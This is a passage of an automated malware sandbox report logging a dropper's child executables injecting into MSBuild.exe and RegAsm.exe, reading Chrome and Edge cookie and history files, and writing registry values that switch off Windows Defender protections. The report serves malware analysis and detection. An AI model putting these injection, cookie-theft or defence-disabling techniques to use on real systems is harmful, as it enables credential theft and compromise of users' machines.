                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 48E000
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 116C008
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeProcess created: C:\Users\user\AppData\Local\Temp\kat806.tmp C:\Users\user\AppData\Local\Temp\kat806.tmp
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_004043C6 cpuid 7_2_004043C6
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_02250AB6
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,7_2_0223C8B7
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,7_2_0224394D
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,7_2_022449EA
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_02243F87
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_0046781B
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: EnumSystemLocalesW,9_2_00467159
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: EnumSystemLocalesW,9_2_004671A4
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: EnumSystemLocalesW,9_2_0046723F
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_004672CA
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetLocaleInfoW,9_2_0045F3B5
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetLocaleInfoW,9_2_0046751D
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00467646
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: EnumSystemLocalesW,9_2_0045EE8F
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,9_2_00466EB7
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: GetLocaleInfoW,9_2_0046774C
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00AB781B
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: EnumSystemLocalesW,11_2_00AB71A4
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: EnumSystemLocalesW,11_2_00AB7159
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00AB72CA
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: EnumSystemLocalesW,11_2_00AB723F
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetLocaleInfoW,11_2_00AAF3B5
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetLocaleInfoW,11_2_00AB751D
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00AB6EB7
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: EnumSystemLocalesW,11_2_00AAEE8F
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00AB7646
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: GetLocaleInfoW,11_2_00AB774C
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeQueries volume information: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00408863 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00408863
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1Jump to behavior
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1
